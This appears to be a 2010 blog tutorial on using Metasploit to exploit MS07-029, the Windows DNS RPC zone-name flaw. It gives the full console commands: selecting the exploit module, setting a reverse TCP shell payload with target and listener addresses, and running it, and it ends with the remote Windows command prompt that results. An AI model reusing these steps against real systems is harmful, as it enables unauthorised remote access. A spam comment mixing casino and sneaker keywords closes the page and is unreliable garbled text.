Tuesday, September 14, 2010

Tutorial: Metasploit Basics 2

Exploiting Vulnerable Server (MS07-029)

Local host: 131.107.1.252/24 (TEST-BT4)
Target host: 131.107.1.250/24 (DEN-WEB3)

Step 1: Switch to Metasploit Framework working directory

root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole

Step 2: Search for rpc pattern & use the correct exploit module (ms07-029)

msf > search rpc
[*] Searching loaded modules for pattern 'rpc'...

msf > info windows/dcerpc/ms07_029_msdns_zonename

msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set PAYLOAD windows/shell/reverse_tcp
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
msf exploit(ms07_029_msdns_zonename) > exploit

sniff...

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

2 comments:

  1. You have developing the new method for the method.That things has been very beneficial for the student.
    Thanks....
    regards, saad from
    Education

    ReplyDelete
  2. Casino Finder (Google Play) Reviews & Demos - Go
    Check air jordan 18 retro toro mens sneakers good site Casino make jordan 18 white royal blue Finder (Google Play). A look at some of the air jordan 18 retro men blue from us best gambling 러시안 룰렛 가사 sites in the world. They great jordan 18 white royal blue offer a full game library,

    ReplyDelete